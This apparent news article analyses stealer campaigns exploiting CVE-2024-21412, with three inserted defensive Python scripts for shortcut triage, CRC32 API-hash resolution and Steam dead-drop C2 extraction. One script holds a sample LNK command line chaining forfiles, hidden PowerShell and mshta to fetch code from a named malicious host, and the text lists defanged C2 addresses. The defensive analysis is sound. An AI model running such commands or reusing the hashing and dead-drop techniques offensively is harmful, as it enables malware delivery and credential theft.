Hackers Exploit Windows SmartScreen Vulnerability: Water Hydra, Lumma & Meduza Stealers

A high-severity security feature bypass vulnerability, tracked as CVE-2024-21412 (Internet Shortcut Files Security Feature Bypass), has been identified in Microsoft Windows SmartScreen and was patched by Microsoft in February 2024.

The flaw stems from how Windows handles internet shortcut (.url) files: a crafted shortcut that points to a second shortcut hosted on an attacker-controlled share is opened without the usual Mark-of-the-Web check, so SmartScreen never shows its warning and the attacker's payload runs.

Over the past year, the Water Hydra threat actor and the campaigns distributing Lumma Stealer and Meduza Stealer have exploited this vulnerability in widespread attacks.

Exploitation Details

FortiGuard Labs has observed a stealer campaign leveraging CVE-2024-21412 to download malicious executable files. Attackers lure victims into clicking crafted links to URL files, which subsequently download LNK files. These LNK files then fetch executable files containing HTA scripts.

Once executed, the HTA script decrypts PowerShell code that retrieves the final URLs, a decoy PDF, and a shell code injector. The injected stealer then collects data from the host and sends it to a command-and-control (C2) server.

Telemetry highlighting the United States, Spain, and Thailand
Attack chain diagram

Initial Access

The attack begins with a malicious link to a remote server that searches for a URL file with specific content.

Constructing a malicious link to a remote server to search for a URL file

The target LNK file uses the “forfiles” command to invoke PowerShell, which in turn runs “mshta” to fetch an executable from the remote server “hxxps://21centuryart.com”.
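The two initial-access artefacts described above (a .url shortcut whose target is a second shortcut on a remote share, and a LNK that chains forfiles into PowerShell into mshta) are easy to triage from file contents alone. The script below is an added example, not code from the article or from FortiGuard Labs; the sample .url body and LNK command line are constructed for it.

```python
"""Triage helper for the two initial-access artefacts described above.
Added example; this is not code from the article or from FortiGuard Labs.
It flags (1) an internet shortcut (.url) whose target is another shortcut
or script on a remote share, the file-chaining pattern behind
CVE-2024-21412, and (2) a LNK command line chaining forfiles -> powershell
-> mshta. The sample .url body and LNK command line are constructed."""
import re
from urllib.parse import urlparse

# Extensions that should never be the target of a shortcut on a remote share
CHAINED_EXTS = (".url", ".lnk", ".hta")
LOLBIN_CHAIN = ("forfiles", "powershell", "mshta")

# Constructed sample: a .url file whose target is a second .url on a WebDAV share
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://203.0.113.10@80/DavWWWRoot/docs/stage2.url\r\n"
    "IDList=\r\n"
)
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
# Constructed sample LNK target, in the shape the article describes
SAMPLE_LNK_CMD = (
    r'C:\Windows\System32\forfiles.exe /p C:\Windows /m notepad.exe '
    r'/c "powershell -w hidden -c mshta hxxps://21centuryart.com/"'
)


def parse_url_shortcut(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section of a .url file."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower() == "[internetshortcut]":
            in_section = True
        elif line.startswith("["):
            in_section = False
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_target(url: str):
    """(host, path) if the target is a UNC path or file:// URL on a remote host."""
    if url.startswith("\\\\"):                      # \\host\share\file
        host, _, path = url.lstrip("\\").partition("\\")
        return host, path
    parsed = urlparse(url)
    if parsed.scheme == "file" and parsed.netloc:   # file://host/share/file
        return parsed.netloc, parsed.path
    return None


def shortcut_findings(text: str) -> list:
    """Reasons a .url file matches the chained-shortcut pattern (empty if none)."""
    target = parse_url_shortcut(text).get("url", "")
    remote = remote_target(target)
    if remote is None:
        return []
    host, path = remote
    findings = [f"target on remote host {host}"]
    if path.lower().endswith(CHAINED_EXTS):
        findings.append(f"remote target is itself a shortcut/script: {path}")
    if "davwwwroot" in path.lower() or "@ssl" in host.lower() or "@80" in host:
        findings.append("target is served over WebDAV")
    return findings


def lolbin_chain(cmdline: str) -> list:
    """LOLBins from LOLBIN_CHAIN present in the command line, in order of appearance."""
    lowered = cmdline.lower()
    hits = []
    for name in LOLBIN_CHAIN:
        m = re.search(r"\b" + name + r"(?:\.exe)?\b", lowered)
        if m:
            hits.append((m.start(), name))
    return [name for _, name in sorted(hits)]


if __name__ == "__main__":
    for reason in shortcut_findings(SAMPLE_URL_FILE):
        print("url:", reason)
    chain = lolbin_chain(SAMPLE_LNK_CMD)
    print("lnk:", " -> ".join(chain), "(full chain)" if chain == list(LOLBIN_CHAIN) else "")
```

A benign shortcut pointing at an https:// site produces no findings; the chained one reports the remote host, the nested .url target and the WebDAV share, and the LNK command line comes back as the full forfiles, powershell, mshta sequence. Feed it the extracted target of a real LNK and the raw bytes of any .url attachment to reproduce the checks.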


HTA Script Execution

Several LNK files were collected during the investigation, all downloading similar executables containing an HTA script embedded within the overlay.

The HTA script sets WINDOWSTATE=“minimize” and SHOWINTASKBAR=“no” so that its window stays out of the victim's sight, and it plays a crucial role in the infection chain by executing the next stage of malicious code.

Decoded and decrypted script

After decoding and decrypting the script, the PowerShell code downloads two files to the “%AppData%” folder: a decoy PDF and an executable that injects shell code for the next stage.

Shell Code Injector

Two types of injectors were identified in this attack chain. The first variant retrieves its shell code from an image file and had low detection rates on VirusTotal.

The injector downloads a JPG file from the Imghippo image-hosting site, decodes bytes embedded in the image into shell code, and calls the shell code's entry point.

The shell code resolves every Windows API it needs by matching CRC32 hashes of export names rather than storing the names in clear, then creates a folder and drops files in “%TEMP%”; the dropped payload was identified as HijackLoader.
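Hash-based API resolution, the technique the shell code above relies on, works by embedding CRC32 values instead of import names and comparing them against the hashed export names of loaded DLLs. The block below is an added example and not code from the article or from the analysed shell code: it computes CRC-32 bitwise, the way a table-less stub does, and builds the reverse lookup an analyst uses to name the hashes pulled out of a sample. It assumes standard CRC-32 (reflected polynomial 0xEDB88320, initial value and final XOR 0xFFFFFFFF) over the ASCII export name; real samples sometimes tweak those constants, so check against the sample's own hashing loop. The export list is a constructed stand-in for the real export tables.

```python
"""Hash-based API resolution as described above. Added example; not code from
the article or from the analysed shell code. Assumption: standard CRC-32
(reflected poly 0xEDB88320, init and final XOR 0xFFFFFFFF) over the ASCII
export name. The export list is a constructed stand-in."""
import zlib

CRC32_POLY = 0xEDB88320


def crc32_bitwise(data: bytes) -> int:
    """Table-less CRC-32, the loop a size-constrained shell code stub would carry."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ CRC32_POLY if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def matches_reference(data: bytes) -> bool:
    """Sanity check: the hand-rolled loop must agree with zlib's CRC-32."""
    return crc32_bitwise(data) == (zlib.crc32(data) & 0xFFFFFFFF)


# Constructed stand-in for the export names of the DLLs the shell code walks
EXPORTS = {
    "kernel32.dll": ["CreateDirectoryW", "CreateFileW", "WriteFile", "CloseHandle",
                     "GetTempPathW", "VirtualAlloc", "VirtualProtect",
                     "CreateProcessW", "LoadLibraryA", "GetProcAddress"],
    "ntdll.dll": ["NtAllocateVirtualMemory", "NtProtectVirtualMemory",
                  "NtWriteVirtualMemory", "NtCreateThreadEx"],
}


def build_hash_table(exports: dict = EXPORTS) -> dict:
    """Map CRC32(name) -> (dll, name), precomputed once over every export of interest."""
    table = {}
    for dll, names in exports.items():
        for name in names:
            table[crc32_bitwise(name.encode("ascii"))] = (dll, name)
    return table


def hashes_for(names) -> list:
    """What a shell code author would embed in place of the given API names."""
    return [crc32_bitwise(n.encode("ascii")) for n in names]


def resolve_hashes(hashes, table: dict) -> list:
    """Name each hash found in a sample; unknown hashes come back as None."""
    return [table.get(h & 0xFFFFFFFF) for h in hashes]


if __name__ == "__main__":
    table = build_hash_table()
    # Hashes as they might sit in a stub that creates a folder and drops files in %TEMP%
    embedded = hashes_for(["GetTempPathW", "CreateDirectoryW", "CreateFileW", "WriteFile"])
    embedded.append(0x12345678)   # an unknown value, to show a miss
    for h, hit in zip(embedded, resolve_hashes(embedded, table)):
        print(f"{h:08x} -> {hit}")
```

In practice the table is built from the full export directories of kernel32, ntdll and the other DLLs the sample loads, so that every 32-bit constant compared in the resolver loop can be labelled; a hash that resolves to nothing under standard CRC-32 is the signal to look for a modified polynomial or seed in the stub.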

Dropping files in the temp folder

The second injector decrypts its code from the data section and uses a series of Windows API functions to perform shell code injection.

Assembly code for calling shell code

Final Stealers

This attack employs Meduza Stealer version 2.9, with its panel found at “hxxp://5[.]42[.]107[.]78/auth/login”.

Meduza Stealer’s panel

An ACR Stealer loaded by HijackLoader was also identified. It hides its C2 address on the Steam Community website, a dead drop resolver (DDR) technique.

Base64 encoded C2 on Steam

Other ACR Stealer C2 servers were found on Steam by searching for the string “t6t”. After retrieving the C2 hostname, ACR Stealer constructs a complete URL to fetch the encoded configuration from the remote server, which contains the information the stealer needs to operate.
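The dead drop resolver step described above amounts to fetching a public profile page, pulling out a base64 token next to a known marker, decoding it and checking that the result is a usable host. The block below is an added example, not code from the article or from ACR Stealer. It assumes that the “t6t” marker directly prefixes the encoded host, that the configuration path is “/config”, and a constructed page body; the article gives neither the exact layout on the Steam page nor the path.

```python
"""Dead drop resolver (DDR) extraction as described above. Added example; not
code from the article or from ACR Stealer. Assumptions: the marker "t6t"
directly prefixes the base64-encoded host, the config path is "/config",
and the page body below is constructed."""
import base64
import ipaddress
import re

MARKER = "t6t"
HOST_RE = re.compile(r"^(?=.{1,253}$)[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)

# Constructed stand-in for a fetched profile page: one dead drop that decodes
# to an IP, and one decoy token that decodes to plain text, not a host
SAMPLE_PAGE = """<div class="profile_header">
  <span class="actual_persona_name">t6tMjAzLjAuMTEzLjU=</span>
  <div class="profile_summary">t6tSGVsbG8gV29ybGQ= streaming tonight</div>
</div>"""


def decode_token(token: str):
    """Base64-decode a token, tolerating missing padding; None if not clean ASCII."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_like_host(value: str) -> bool:
    """Accept an IPv4/IPv6 literal or a dotted hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOST_RE.match(value))


def extract_dead_drops(page: str, marker: str = MARKER) -> list:
    """Hosts hidden after `marker` in the page, in order, without duplicates."""
    pattern = re.compile(re.escape(marker) + r"([A-Za-z0-9+/]{8,}={0,2})")
    hosts = []
    for m in pattern.finditer(page):
        host = decode_token(m.group(1))
        if host and looks_like_host(host) and host not in hosts:
            hosts.append(host)
    return hosts


def config_url(host: str, path: str = "/config") -> str:
    """Assumed shape of the URL the stealer builds to fetch its encoded config."""
    return f"http://{host}{path}"


if __name__ == "__main__":
    for host in extract_dead_drops(SAMPLE_PAGE):
        print(host, "->", config_url(host))
```

The host check is what separates a real dead drop from noise: on a page full of base64-looking strings, only tokens that decode to an IP literal or a dotted hostname are kept, and the decoy token in the sample, which decodes to "Hello World", is dropped. When hunting, run the same extraction over the profile pages returned by a search for the marker string.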

Decoded configuration

The exploitation of CVE-2024-21412 by Water Hydra and by the Lumma Stealer and Meduza Stealer campaigns highlights the need for robust security measures.

Users are advised to apply the February 2024 Windows security update that fixes CVE-2024-21412 promptly and to remain vigilant against suspicious links and files, in particular .url and .lnk shortcuts delivered by email or from untrusted sites. Businesses can lessen the impact of such attacks by teaching their customers and staff not to open files from unknown sources.

Threat actors continually invent new delivery methods, so protecting a company’s digital assets requires a proactive strategy: timely patching, user education, and strict security policies.


Dhivya
Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.